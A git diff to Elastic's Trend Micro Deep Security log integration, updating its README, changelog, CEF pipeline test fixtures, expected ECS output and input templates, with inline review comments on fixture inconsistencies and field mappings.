+ +## Installing and managing an Elastic Agent: + +You have a few options for installing and managing an Elastic Agent: + +### Install a Fleet-managed Elastic Agent (recommended): + +With this approach, you install Elastic Agent and use Fleet in Kibana to define, configure, and manage your agents in a central location. We recommend using Fleet management because it makes the management and upgrade of your agents considerably easier. + +### Install Elastic Agent in standalone mode (advanced users): + +With this approach, you install Elastic Agent and manually configure the agent locally on the system where it’s installed. You are responsible for managing and upgrading the agents. This approach is reserved for advanced users only. + +### Install Elastic Agent in a containerized environment: + +You can run Elastic Agent inside a container, either with Fleet Server or standalone. Docker images for all versions of Elastic Agent are available from the Elastic Docker registry, and we provide deployment manifests for running on Kubernetes. + +There are some minimum requirements for running Elastic Agent and for more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +The minimum **kibana.version** required is **8.11.0**. + +This integration has been tested against Deep Security 20. Please note if you have a Trend Micro Vision One XDR license, we recommend using the [Vision One](https://docs.elastic.co/integrations/trend_micro_vision_one) integration to ingest Deep Security events. For steps on how to configure Deep Security events with Vision One, please see [here](https://help.deepsecurity.trendmicro.com/aws/xdr.html). + +## Setup + +Follow the [setup guide](https://help.deepsecurity.trendmicro.com/20_0/on-premise/event-syslog.html) to forward deep security events to a syslog server. + +### Enabling the integration in Elastic: + +1. In Kibana go to Management > Integrations +2. 
In "Search for integrations" search bar, type Trend Micro. +3. Click on the "Trend Micro" integration from the search results. +4. Click on the "Add Trend Micro" button to add the integration. +5. Add all the required integration configuration parameters according to the enabled input type. +6. Click on "Save and Continue" to save the integration. ## Logs @@ -18,4 +53,6 @@ Elastic Agent is required to ingest data from Deep Security log files. This inte Deep Security logs collect the trendmicro deep security logs. +{{event "deep_security"}} + {{fields "deep_security"}} diff --git a/packages/trendmicro/changelog.yml b/packages/trendmicro/changelog.yml index fe2787f3e56..5dad01043b1 100644 --- a/packages/trendmicro/changelog.yml +++ b/packages/trendmicro/changelog.yml @@ -1,4 +1,22 @@ # newer versions go on top +- version: "2.2.0" + changes: + - description: Add ECS categorizations for anti-malware events. + type: enhancement + link: https://github.com/elastic/integrations/pull/9407 +- version: "2.1.0" + changes: + - description: Use CEF name as `event.action` if no action is specified. + type: enhancement + link: https://github.com/elastic/integrations/pull/9292 +- version: "2.0.0" + changes: + - description: Breaking changes for improved ECS mappings, new dashboards and compatibility with Deep Security v20. + type: enhancement + link: https://github.com/elastic/integrations/pull/9124 + - description: Update the minimum kibana version to 8.11.0. + type: enhancement + link: https://github.com/elastic/integrations/pull/9124 - version: "1.8.4" changes: - description: Changed owners diff --git a/packages/trendmicro/data_stream/deep_security/_dev/test/pipeline/test-common-config.yml b/packages/trendmicro/data_stream/deep_security/_dev/test/pipeline/test-common-config.yml index 4da22641654..be41bb0d476 100644 --- a/packages/trendmicro/data_stream/deep_security/_dev/test/pipeline/test-common-config.yml 
+++ b/packages/trendmicro/data_stream/deep_security/_dev/test/pipeline/test-common-config.yml @@ -1,3 +1,4 @@ fields: tags: - preserve_original_event + - preserve_duplicate_custom_fields diff --git a/packages/trendmicro/data_stream/deep_security/_dev/test/pipeline/test-trendmicro.json b/packages/trendmicro/data_stream/deep_security/_dev/test/pipeline/test-trendmicro.json index bc5bd20ae85..b879727d579 100644 --- a/packages/trendmicro/data_stream/deep_security/_dev/test/pipeline/test-trendmicro.json +++ b/packages/trendmicro/data_stream/deep_security/_dev/test/pipeline/test-trendmicro.json 
@@ -115,6 +115,142 @@ "name": "System" } } + }, + { + "@timestamp": "2024-01-22T10:19:47.482Z", + "event": { + "code": "1001251", + "severity": 6, + "action": "Reset", + "original": "<190>Jan 19 13:36:47 2K19-va CEF:0|Trend Micro|Deep Security Agent|20.0.1.690|1001251|Disallow Web Proxy Autodiscovery Protocol|6|cn1=4 cn1Label=Host ID dvchost=2K19-va.test.local TrendMicroDsTenant=814726098539 TrendMicroDsTenantId=16005 dmac=11-AA-00-00-AA-00 smac=00-BB-00-00-BB-00 TrendMicroDsFrameType=IP src=216.160.83.56 dst=81.2.69.144 in=150 proto=UDP spt=53 dpt=65535 cnt=1 act=Reset cn3=16 cn3Label=DPI Packet Position cs5=16 cs5Label=DPI Stream Position cs1=CVE-2007-5355 cs1Label=DPI Note cs6=8 cs6Label=DPI Flags TrendMicroDsPacketData=PUaBgwABAAAAAQAABHdwYWQEdGVzdAVsb2NhbAAAAQABAAAGAAEAAVF5AEABYQxyb290LXNlcnZlcnMDbmV0AAVuc3RsZAx2ZXJpc2lnbi1ncnMDY29tAHij+HwAAAcIAAADhAAJOoAAAVGA" + }, + "source": { + "port": 53, + "mac": "00-BB-00-00-BB-00", + "ip": "216.160.83.56", + "bytes": 150 + }, + "message": "Disallow Web Proxy Autodiscovery Protocol", + "cef": { + "name": "Disallow Web Proxy Autodiscovery Protocol", + "severity": "6", + "extensions": { + "deviceCustomString6": "8", + "sourceMacAddress": "00-BB-00-00-BB-00", + "deviceCustomString1Label": "DPI Note", + "destinationPort": 65535, + "deviceCustomString5Label": "DPI Stream Position", + "deviceCustomNumber3": 16, + "transportProtocol": "UDP", + "sourcePort": 53, + "deviceCustomNumber1": 4, + "TrendMicroDsFrameType": "IP", + "destinationMacAddress": "11-AA-00-00-AA-00", + "TrendMicroDsTenant": "814726098539", + "TrendMicroDsPacketData": "PUaBgwAAAAAQAABHdwYWQEdGVzdAVsb2NhbAAAAQABAAAGAAEAAVF5AEABYQxyb290LXNlcnZlcnMDbmV0AAVuc3RsZAx2ZXJpc2lnbi1ncnMDY29tAHij+HwAAAcIAAADhAAJOoAAAVGA", + "deviceAction": "Reset", + "destinationAddress": "81.2.69.144", + "deviceCustomString1": "CVE-2007-5355", + "sourceAddress": "216.160.83.56", + "deviceCustomString6Label": "DPI Flags", + "deviceHostName": "2K19-va.test.local", + "deviceCustomString5": 
"16", + "deviceCustomNumber1Label": "Host ID", + "deviceCustomNumber3Label": "DPI Packet Position", + "baseEventCount": 1, + "bytesIn": 150, + "TrendMicroDsTenantId": "16005" + }, + "version": "0", + "device": { + "vendor": "Trend Micro", + "product": "Deep Security Agent", + "version": "20.0.1.690", + "event_class_id": "1001251" + } + }, + "network": { + "transport": "udp" + }, + "observer": { + "product": "Deep Security Agent", + "version": "20.0.1.690", + "hostname": "2K19-va.test.local", + "vendor": "Trend Micro" + }, + "destination": { + "ip": "81.2.69.144", + "port": 65535, + "mac": "11-AA-00-00-AA-00" + } + }, + { + "@timestamp": "2024-01-22T10:19:47.482Z", + "event": { + "code": "4000000", + "severity": 6, + "action": "Reset", + "original": "<190>Jan 19 13:36:47 2K19-va CEF:0|Trend Micro|Deep Security Agent|20.0.1.690|1001251|Disallow Web Proxy Autodiscovery Protocol|6|cn1=4 cn1Label=Host ID dvchost=2K19-va.test.local TrendMicroDsTenant=814726098539 TrendMicroDsTenantId=16005 dmac=11-AA-00-00-AA-00 smac=00-BB-00-00-BB-00 TrendMicroDsFrameType=IP src=216.160.83.56 dst=81.2.69.144 in=150 proto=UDP spt=53 dpt=65535 cnt=1 act=Reset cn3=16 cn3Label=DPI Packet Position cs5=16 cs5Label=DPI Stream Position cs1=CVE-2007-5355 cs1Label=DPI Note cs6=8 cs6Label=DPI Flags TrendMicroDsPacketData=PUaBgwABAAAAAQAABHdwYWQEdGVzdAVsb2NhbAAAAQABAAAGAAEAAVF5AEABYQxyb290LXNlcnZlcnMDbmV0AAVuc3RsZAx2ZXJpc2lnbi1ncnMDY29tAHij+HwAAAcIAAADhAAJOoAAAVGA" + }, + "source": { + "port": 53, + "mac": "00-BB-00-00-BB-00", + "ip": "216.160.83.56", + "bytes": 150 + }, + "message": "Disallow Web Proxy Autodiscovery Protocol", + "cef": { + "name": "Disallow Web Proxy Autodiscovery Protocol", + "severity": "6", + "extensions": { + "deviceCustomString6": "8", + "sourceMacAddress": "00-BB-00-00-BB-00", + "deviceCustomString1Label": "DPI Note", + "destinationPort": 65535, + "deviceCustomString5Label": "DPI Stream Position", + "deviceCustomNumber3": 16, + "transportProtocol": "UDP", + "sourcePort": 53, 
+ "deviceCustomNumber1": 4, + "TrendMicroDsFrameType": "IP", + "destinationMacAddress": "11-AA-00-00-AA-00", + "TrendMicroDsTenant": "814726098539", + "TrendMicroDsPacketData": "PUaBgwAAAAAQAABHdwYWQEdGVzdAVsb2NhbAAAAQABAAAGAAEAAVF5AEABYQxyb290LXNlcnZlcnMDbmV0AAVuc3RsZAx2ZXJpc2lnbi1ncnMDY29tAHij+HwAAAcIAAADhAAJOoAAAVGA", + "deviceAction": "Reset", + "destinationAddress": "81.2.69.144", + "deviceCustomString1": "CVE-2007-5355", + "sourceAddress": "216.160.83.56", + "deviceCustomString6Label": "DPI Flags", + "deviceHostName": "2K19-va.test.local", + "deviceCustomString5": "16", + "deviceCustomNumber1Label": "Host ID", + "deviceCustomNumber3Label": "DPI Packet Position", + "baseEventCount": 1, + "bytesIn": 150, + "TrendMicroDsTenantId": "16005" + }, + "version": "0", + "device": { + "vendor": "Trend Micro", + "product": "Deep Security Agent", + "version": "20.0.1.690", + "event_class_id": "4000001" + } + }, + "network": { + "transport": "udp" + }, + "observer": { + "product": "Deep Security Agent", + "version": "20.0.1.690", + "hostname": "2K19-va.test.local", + "vendor": "Trend Micro" + }, + "destination": { + "ip": "81.2.69.144", + "port": 65535, + "mac": "11-AA-00-00-AA-00" + } } ] } \ No newline at end of file diff --git a/packages/trendmicro/data_stream/deep_security/_dev/test/pipeline/test-trendmicro.json-expected.json b/packages/trendmicro/data_stream/deep_security/_dev/test/pipeline/test-trendmicro.json-expected.json index 9340e5d3121..ac8cbd19a75 100644 --- a/packages/trendmicro/data_stream/deep_security/_dev/test/pipeline/test-trendmicro.json-expected.json +++ b/packages/trendmicro/data_stream/deep_security/_dev/test/pipeline/test-trendmicro.json-expected.json 
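Review bot: The second fixture added in this hunk is internally inconsistent: `event.code` is `4000000`, `cef.device.event_class_id` is `4000001`, and `event.original` still carries the copied `|1001251|` CEF header, so three different identifiers describe one event. The expected output keys `event.code`, `event.kind: alert` and the `malware` category off `event_class_id`, which makes the `4000000` value dead input — a regression that started reading `event.code` instead would pass unnoticed. Align the three (`"code": "4000001"` and the same id inside `event.original`) so the fixture exercises one unambiguous anti-malware event; the `TrendMicroDsPacketData` value in `extensions` is also two characters shorter than the one in `event.original`, which looks like the same copy-paste drift and yields invalid base64.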
@@ -6,27 +6,31 @@ "version": "8.11.0" }, "event": { - "category": [ - "malware", - "threat" - ], + "action": "integrity-monitoring-rule-updated", "code": "482", + "kind": "event", "original": "<190>2021-10-06T01:29:43-07:00 192.168.1.20 CEF:0|Trend Micro|Deep Security Manager|12.0.327|482|Integrity Monitoring Rule Updated|3|src=192.168.1.20 suser=System target=1011144 - Microsoft Windows - AutoRun registries modified (ATT&CK T1547.001) msg=Description Omitted TrendMicroDsTenant=Primary TrendMicroDsTenantId=0", - "severity": 3, - "type": [ - "info" - ] + "severity": 3 }, "log": { "syslog": { "priority": 190 } }, + "message": "Description Omitted", "observer": { "product": "Deep Security Manager", "vendor": "Trend Micro", "version": "12.0.327" }, + "related": { + "ip": [ + "192.168.1.20" + ], + "user": [ + "System" + ] + }, "source": { "ip": "192.168.1.20", "user": { @@ -34,17 +38,34 @@ } }, "tags": [ - "preserve_original_event" + "preserve_original_event", + "preserve_duplicate_custom_fields" ], "trendmicro": { - "event": { - "category": "system", + "deep_security": { + "device": { + "product": "Deep Security Manager", + "vendor": "Trend Micro", + "version": "12.0.327" + }, + "event_category": "system-event", + "event_class_id": "482", "message": "Description Omitted", "name": "Integrity Monitoring Rule Updated", + "severity": 3, "signature_id": 482, - "target": "1011144 - Microsoft Windows - AutoRun registries modified (ATT&CK T1547.001)", - "tenant_id": "0", - "tenant_name": "Primary" + "source": { + "address": "192.168.1.20", + "user_name": "System" + }, + "target": { + "value": "1011144 - Microsoft Windows - AutoRun registries modified (ATT&CK T1547.001)" + }, + "trendmicro": { + "ds_tenant": "Primary", + "ds_tenant_id": "0" + }, + "version": "0" } } }, 
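Review bot: The expected output for the Deep Security Manager system events (`code` 482, 190, 740) now has `event.kind: event` but no `event.category` or `event.type` at all, where the old expectation carried `["malware","threat"]` / `["info"]`. The old categorization was clearly wrong for an "Integrity Monitoring Rule Updated" event, but dropping it entirely means detection rules and dashboards that filter on `event.category` will no longer see these events; ECS would suggest something like `event.category: ["configuration"]` with `event.type: ["change"]` for rule updates. The ingest pipeline that produces these values is not in this diff, so this is an observation on the expected file; if the omission is intentional, a changelog line noting that system events are now uncategorized would save users a surprise.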
@@ -54,27 +75,31 @@ "version": "8.11.0" }, "event": { - "category": [ - "malware", - "threat" - ], + "action": "alert-started", "code": "190", + "kind": "event", "original": "<190>2021-10-06T01:34:40-07:00 192.168.1.20 CEF:0|Trend Micro|Deep Security Manager|12.0.327|190|Alert Started|3|src=192.168.1.20 suser=System msg=Alert: Memory Critical Threshold Exceeded\\nSubject: 192.168.1.20\\nSeverity: Critical TrendMicroDsTenant=Primary TrendMicroDsTenantId=0", - "severity": 3, - "type": [ - "info" - ] + "severity": 3 }, "log": { "syslog": { "priority": 190 } }, + "message": "Alert: Memory Critical Threshold Exceeded\\nSubject: 192.168.1.20\\nSeverity: Critical", "observer": { "product": "Deep Security Manager", "vendor": "Trend Micro", "version": "12.0.327" }, + "related": { + "ip": [ + "192.168.1.20" + ], + "user": [ + "System" + ] + }, "source": { "ip": "192.168.1.20", "user": { @@ -82,16 +107,31 @@ } }, "tags": [ - "preserve_original_event" + "preserve_original_event", + "preserve_duplicate_custom_fields" ], "trendmicro": { - "event": { - "category": "system", + "deep_security": { + "device": { + "product": "Deep Security Manager", + "vendor": "Trend Micro", + "version": "12.0.327" + }, + "event_category": "system-event", + "event_class_id": "190", "message": "Alert: Memory Critical Threshold Exceeded\\nSubject: 192.168.1.20\\nSeverity: Critical", "name": "Alert Started", + "severity": 3, "signature_id": 190, - "tenant_id": "0", - "tenant_name": "Primary" + "source": { + "address": "192.168.1.20", + "user_name": "System" + }, + "trendmicro": { + "ds_tenant": "Primary", + "ds_tenant_id": "0" + }, + "version": "0" } } }, 
@@ -101,27 +141,31 @@ "version": "8.11.0" }, "event": { - "category": [ - "malware", - "threat" - ], + "action": "agent-appliance-error", "code": "740", + "kind": "event", "original": "<190>2021-10-09T01:54:56-07:00 192.168.1.20 CEF:0|Trend Micro|Deep Security Manager|12.0.327|740|Agent/Appliance Error|8|src=192.168.1.20 suser=System target=SMC-NewAPP (192.168.1.61) msg=The Agent/Appliance reported one or more warnings or errors. Details are found in the Agent/Appliance events listed below. TrendMicroDsTenant=Primary TrendMicroDsTenantId=0", - "severity": 8, - "type": [ - "info" - ] + "severity": 8 }, "log": { "syslog": { "priority": 190 } }, + "message": "The Agent/Appliance reported one or more warnings or errors. Details are found in the Agent/Appliance events listed below.", "observer": { "product": "Deep Security Manager", "vendor": "Trend Micro", "version": "12.0.327" }, + "related": { + "ip": [ + "192.168.1.20" + ], + "user": [ + "System" + ] + }, "source": { "ip": "192.168.1.20", "user": { 
@@ -129,17 +173,318 @@ } }, "tags": [ - "preserve_original_event" + "preserve_original_event", + "preserve_duplicate_custom_fields" ], "trendmicro": { - "event": { - "category": "system", + "deep_security": { + "device": { + "product": "Deep Security Manager", + "vendor": "Trend Micro", + "version": "12.0.327" + }, + "event_category": "system-event", + "event_class_id": "740", "message": "The Agent/Appliance reported one or more warnings or errors. Details are found in the Agent/Appliance events listed below.", "name": "Agent/Appliance Error", + "severity": 8, "signature_id": 740, - "target": "SMC-NewAPP (192.168.1.61)", - "tenant_id": "0", - "tenant_name": "Primary" + "source": { + "address": "192.168.1.20", + "user_name": "System" + }, + "target": { + "value": "SMC-NewAPP (192.168.1.61)" + }, + "trendmicro": { + "ds_tenant": "Primary", + "ds_tenant_id": "0" + }, + "version": "0" + } + } + }, + { + "@timestamp": "2024-01-19T13:36:47.000Z", + "destination": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144", + "mac": "11-AA-00-00-AA-00", + "port": 65535 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "reset", + "category": [ + "intrusion_detection" + ], + "code": "1001251", + "kind": "event", + "original": "<190>Jan 19 13:36:47 2K19-va CEF:0|Trend Micro|Deep Security Agent|20.0.1.690|1001251|Disallow Web Proxy Autodiscovery Protocol|6|cn1=4 cn1Label=Host ID dvchost=2K19-va.test.local TrendMicroDsTenant=814726098539 TrendMicroDsTenantId=16005 dmac=11-AA-00-00-AA-00 smac=00-BB-00-00-BB-00 TrendMicroDsFrameType=IP src=216.160.83.56 dst=81.2.69.144 in=150 proto=UDP spt=53 dpt=65535 cnt=1 act=Reset cn3=16 cn3Label=DPI Packet Position cs5=16 cs5Label=DPI Stream Position cs1=CVE-2007-5355 cs1Label=DPI Note cs6=8 cs6Label=DPI Flags 
TrendMicroDsPacketData=PUaBgwABAAAAAQAABHdwYWQEdGVzdAVsb2NhbAAAAQABAAAGAAEAAVF5AEABYQxyb290LXNlcnZlcnMDbmV0AAVuc3RsZAx2ZXJpc2lnbi1ncnMDY29tAHij+HwAAAcIAAADhAAJOoAAAVGA", + "severity": 6, + "type": [ + "info" + ] + }, + "host": { + "id": "4" + }, + "log": { + "syslog": { + "priority": 190 + } + }, + "message": "Disallow Web Proxy Autodiscovery Protocol", + "network": { + "community_id": "1:TJGLD3dNqhqQdTNdSwivLmyc8vs=", + "transport": "udp" + }, + "observer": { + "hostname": "2K19-va.test.local", + "product": "Deep Security Agent", + "vendor": "Trend Micro", + "version": "20.0.1.690" + }, + "related": { + "hosts": [ + "4" + ], + "ip": [ + "81.2.69.144", + "216.160.83.56" + ] + }, + "source": { + "bytes": 150, + "geo": { + "city_name": "Milton", + "continent_name": "North America", + "country_iso_code": "US", + "country_name": "United States", + "location": { + "lat": 47.2513, + "lon": -122.3149 + }, + "region_iso_code": "US-WA", + "region_name": "Washington" + }, + "ip": "216.160.83.56", + "mac": "00-BB-00-00-BB-00", + "port": 53 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "trendmicro": { + "deep_security": { + "action": "Reset", + "base_event_count": 1, + "bytes_in": 150, + "destination": { + "address": "81.2.69.144", + "mac_address": "11-AA-00-00-AA-00", + "port": 65535 + }, + "device": { + "custom_number1": { + "label": "Host ID", + "value": "4" + }, + "custom_number3": { + "label": "DPI Packet Position", + "value": 16 + }, + "custom_string1": { + "label": "DPI Note", + "value": "CVE-2007-5355" + }, + "custom_string5": { + "label": "DPI Stream Position", + "value": "16" + }, + "custom_string6": { + "label": "DPI Flags", + "value": "8" + }, + "product": "Deep Security Agent", + "vendor": "Trend Micro", + "version": "20.0.1.690" + }, + "deviceHostName": "2K19-va.test.local", + "event_category": "intrusion-prevention-event", + "event_class_id": "1001251", + "name": "Disallow Web Proxy Autodiscovery Protocol", + 
"severity": 6, + "signature_id": 1001251, + "source": { + "address": "216.160.83.56", + "mac_address": "00-BB-00-00-BB-00", + "port": 53 + }, + "transport_protocol": "UDP", + "trendmicro": { + "ds_frame_type": "IP", + "ds_packet_data": "PUaBgwAAAAAQAABHdwYWQEdGVzdAVsb2NhbAAAAQABAAAGAAEAAVF5AEABYQxyb290LXNlcnZlcnMDbmV0AAVuc3RsZAx2ZXJpc2lnbi1ncnMDY29tAHij+HwAAAcIAAADhAAJOoAAAVGA", + "ds_tenant": "814726098539", + "ds_tenant_id": "16005" + }, + "version": "0" + } + } + }, + { + "@timestamp": "2024-01-19T13:36:47.000Z", + "destination": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144", + "mac": "11-AA-00-00-AA-00", + "port": 65535 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "reset", + "category": [ + "malware" + ], + "code": "4000001", + "kind": "alert", + "original": "<190>Jan 19 13:36:47 2K19-va CEF:0|Trend Micro|Deep Security Agent|20.0.1.690|1001251|Disallow Web Proxy Autodiscovery Protocol|6|cn1=4 cn1Label=Host ID dvchost=2K19-va.test.local TrendMicroDsTenant=814726098539 TrendMicroDsTenantId=16005 dmac=11-AA-00-00-AA-00 smac=00-BB-00-00-BB-00 TrendMicroDsFrameType=IP src=216.160.83.56 dst=81.2.69.144 in=150 proto=UDP spt=53 dpt=65535 cnt=1 act=Reset cn3=16 cn3Label=DPI Packet Position cs5=16 cs5Label=DPI Stream Position cs1=CVE-2007-5355 cs1Label=DPI Note cs6=8 cs6Label=DPI Flags TrendMicroDsPacketData=PUaBgwABAAAAAQAABHdwYWQEdGVzdAVsb2NhbAAAAQABAAAGAAEAAVF5AEABYQxyb290LXNlcnZlcnMDbmV0AAVuc3RsZAx2ZXJpc2lnbi1ncnMDY29tAHij+HwAAAcIAAADhAAJOoAAAVGA", + "severity": 6, + "type": [ + "info" + ] + }, + "host": { + "id": "4" + }, + "log": { + "syslog": { + "priority": 190 + } + }, + "message": "Disallow Web Proxy Autodiscovery Protocol", + "network": { + "community_id": "1:TJGLD3dNqhqQdTNdSwivLmyc8vs=", + "transport": "udp" + }, 
+ "observer": { + "hostname": "2K19-va.test.local", + "product": "Deep Security Agent", + "vendor": "Trend Micro", + "version": "20.0.1.690" + }, + "related": { + "hosts": [ + "4" + ], + "ip": [ + "81.2.69.144", + "216.160.83.56" + ] + }, + "source": { + "bytes": 150, + "geo": { + "city_name": "Milton", + "continent_name": "North America", + "country_iso_code": "US", + "country_name": "United States", + "location": { + "lat": 47.2513, + "lon": -122.3149 + }, + "region_iso_code": "US-WA", + "region_name": "Washington" + }, + "ip": "216.160.83.56", + "mac": "00-BB-00-00-BB-00", + "port": 53 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "trendmicro": { + "deep_security": { + "action": "Reset", + "base_event_count": 1, + "bytes_in": 150, + "destination": { + "address": "81.2.69.144", + "mac_address": "11-AA-00-00-AA-00", + "port": 65535 + }, + "device": { + "custom_number1": { + "label": "Host ID", + "value": "4" + }, + "custom_number3": { + "label": "DPI Packet Position", + "value": 16 + }, + "custom_string1": { + "label": "DPI Note", + "value": "CVE-2007-5355" + }, + "custom_string5": { + "label": "DPI Stream Position", + "value": "16" + }, + "custom_string6": { + "label": "DPI Flags", + "value": "8" + }, + "product": "Deep Security Agent", + "vendor": "Trend Micro", + "version": "20.0.1.690" + }, + "deviceHostName": "2K19-va.test.local", + "event_category": "anti-malware-event", + "event_class_id": "4000001", + "name": "Disallow Web Proxy Autodiscovery Protocol", + "severity": 6, + "signature_id": 4000001, + "source": { + "address": "216.160.83.56", + "mac_address": "00-BB-00-00-BB-00", + "port": 53 + }, + "transport_protocol": "UDP", + "trendmicro": { + "ds_frame_type": "IP", + "ds_packet_data": "PUaBgwAAAAAQAABHdwYWQEdGVzdAVsb2NhbAAAAQABAAAGAAEAAVF5AEABYQxyb290LXNlcnZlcnMDbmV0AAVuc3RsZAx2ZXJpc2lnbi1ncnMDY29tAHij+HwAAAcIAAADhAAJOoAAAVGA", + "ds_tenant": "814726098539", + "ds_tenant_id": "16005" + }, + "version": "0" } } } 
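Review bot: The agent-event expectations apparently promote the CEF `cn1`/`Host ID` value `4` to ECS `host.id` (and `related.hosts`), but that is Deep Security Manager's internal numeric host identifier, not a globally unique host id, so it will collide with `host.id` values from every other integration and from other DSM tenants in the same cluster (note `ds_tenant_id` 16005 on the same event). Leaving it under the custom namespace — it is already in `trendmicro.deep_security.device.custom_number1.value` — or at least not adding it to `related.hosts` would avoid false correlation; the pipeline is not in this diff, so this is raised on the expected output. Separately, `trendmicro.deep_security.deviceHostName` is the only camelCase key among snake_case siblings such as `transport_protocol` and `base_event_count`; it presumably slipped past a generic rename and should be `device_host_name` (or dropped, since the value already lands in `observer.hostname`).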
diff --git a/packages/trendmicro/data_stream/deep_security/_dev/test/system/test-tcp-config.yml b/packages/trendmicro/data_stream/deep_security/_dev/test/system/test-tcp-config.yml index 595a6d18b39..c47d17cd076 100644 --- a/packages/trendmicro/data_stream/deep_security/_dev/test/system/test-tcp-config.yml +++ b/packages/trendmicro/data_stream/deep_security/_dev/test/system/test-tcp-config.yml @@ -3,10 +3,10 @@ service_notify_signal: SIGHUP input: tcp data_stream: vars: - tcp_host: 0.0.0.0 - tcp_port: 9514 + listen_address: 0.0.0.0 + listen_port: 9514 preserve_original_event: true - decode_trendmicro_timezone: UTC + tz_offset: UTC numeric_keyword_fields: - log.file.device_id - log.file.inode diff --git a/packages/trendmicro/data_stream/deep_security/_dev/test/system/test-tls-config.yml b/packages/trendmicro/data_stream/deep_security/_dev/test/system/test-tls-config.yml index fd82b0aff73..7b5b0d8f357 100644 --- a/packages/trendmicro/data_stream/deep_security/_dev/test/system/test-tls-config.yml +++ b/packages/trendmicro/data_stream/deep_security/_dev/test/system/test-tls-config.yml @@ -3,10 +3,10 @@ service_notify_signal: SIGHUP input: tcp data_stream: vars: - tcp_host: 0.0.0.0 - tcp_port: 9515 + listen_address: 0.0.0.0 + listen_port: 9515 preserve_original_event: true - decode_trendmicro_timezone: UTC + tz_offset: UTC ssl: | key: | -----BEGIN PRIVATE KEY----- diff --git a/packages/trendmicro/data_stream/deep_security/_dev/test/system/test-udp-config.yml b/packages/trendmicro/data_stream/deep_security/_dev/test/system/test-udp-config.yml index e1145d8ec57..bab5e73e6a2 100644 --- a/packages/trendmicro/data_stream/deep_security/_dev/test/system/test-udp-config.yml +++ b/packages/trendmicro/data_stream/deep_security/_dev/test/system/test-udp-config.yml 
@@ -3,10 +3,10 @@ service_notify_signal: SIGHUP
input: udp
data_stream:
vars:
- udp_host: 0.0.0.0
- udp_port: 9515
+ listen_address: 0.0.0.0
+ listen_port: 9515
preserve_original_event: true
- decode_trendmicro_timezone: UTC
+ tz_offset: UTC
numeric_keyword_fields:
- log.file.device_id
- log.file.inode
diff --git a/packages/trendmicro/data_stream/deep_security/agent/stream/stream.yml.hbs b/packages/trendmicro/data_stream/deep_security/agent/stream/filestream.yml.hbs
similarity index 59%
rename from packages/trendmicro/data_stream/deep_security/agent/stream/stream.yml.hbs
rename to packages/trendmicro/data_stream/deep_security/agent/stream/filestream.yml.hbs
index 55a56f82946..3117c8e5b12 100644
--- a/packages/trendmicro/data_stream/deep_security/agent/stream/stream.yml.hbs
+++ b/packages/trendmicro/data_stream/deep_security/agent/stream/filestream.yml.hbs
@@ -1,12 +1,15 @@
paths:
- {{#each paths as |path i|}}
-- {{path}}
- {{/each}}
-exclude_files: ['\.gz$']
+{{#each paths as |path|}}
+ - {{path}}
+{{/each}}
+exclude_files: [".gz$"]
tags:
{{#if preserve_original_event}}
- preserve_original_event
{{/if}}
+{{#if preserve_duplicate_custom_fields}}
+ - preserve_duplicate_custom_fields
+{{/if}}
{{#each tags as |tag|}}
- {{tag}}
{{/each}}
@@ -19,9 +22,12 @@ processors:
- {from: "message", to: "event.original"}
- decode_cef:
field: event.original
-{{#if decode_trendmicro_timezone}}
- timezone: {{ decode_trendmicro_timezone }}
+{{#if tz_offset}}
+fields_under_root: true
+fields:
+ _conf:
+ tz_offset: {{tz_offset}}
{{/if}}
{{#if processors}}
{{processors}}
-{{/if}}
\ No newline at end of file
+{{/if}}
diff --git a/packages/trendmicro/data_stream/deep_security/agent/stream/tcp.yml.hbs b/packages/trendmicro/data_stream/deep_security/agent/stream/tcp.yml.hbs
index b23af84b371..573f782b358 100644
--- a/packages/trendmicro/data_stream/deep_security/agent/stream/tcp.yml.hbs
+++ b/packages/trendmicro/data_stream/deep_security/agent/stream/tcp.yml.hbs
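Review bot: `exclude_files: [".gz$"]` in the first filestream hunk drops the backslash the removed line carried (`['\.gz$']`), so the dot is now a regex wildcard and the input will also skip any file whose name ends in three characters such as `tgz` or `agz`, not only `.gz` archives. This unescaped form appears in other integrations too, but it is a behaviour change relative to the removed line, and the escaped pattern is no harder to read: `exclude_files: ['\.gz$']`. If the wildcard is intended, a one-line comment above it saying so would keep the next reviewer from flagging it again.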
@@ -1,4 +1,7 @@
-host: "{{tcp_host}}:{{tcp_port}}"
+host: "{{listen_address}}:{{listen_port}}"
+{{#if tcp_options}}
+{{tcp_options}}
+{{/if}}
{{#if ssl}}
ssl: {{ssl}}
{{/if}}
@@ -6,6 +9,9 @@ tags:
{{#if preserve_original_event}}
- preserve_original_event
{{/if}}
+{{#if preserve_duplicate_custom_fields}}
+ - preserve_duplicate_custom_fields
+{{/if}}
{{#each tags as |tag|}}
- {{tag}}
{{/each}}
@@ -18,9 +24,12 @@ processors:
- {from: "message", to: "event.original"}
- decode_cef:
field: event.original
-{{#if decode_trendmicro_timezone}}
- timezone: {{ decode_trendmicro_timezone }}
+{{#if tz_offset}}
+fields_under_root: true
+fields:
+ _conf:
+ tz_offset: {{tz_offset}}
{{/if}}
{{#if processors}}
{{processors}}
-{{/if}}
\ No newline at end of file
+{{/if}}
diff --git a/packages/trendmicro/data_stream/deep_security/agent/stream/udp.yml.hbs b/packages/trendmicro/data_stream/deep_security/agent/stream/udp.yml.hbs
index 19f75bce816..edd2b79c54d 100644
--- a/packages/trendmicro/data_stream/deep_security/agent/stream/udp.yml.hbs
+++ b/packages/trendmicro/data_stream/deep_security/agent/stream/udp.yml.hbs
@@ -1,8 +1,14 @@
-host: "{{udp_host}}:{{udp_port}}"
+host: "{{listen_address}}:{{listen_port}}"
+{{#if udp_options}}
+{{udp_options}}
+{{/if}}
tags:
{{#if preserve_original_event}}
- preserve_original_event
{{/if}}
+{{#if preserve_duplicate_custom_fields}}
+ - preserve_duplicate_custom_fields
+{{/if}}
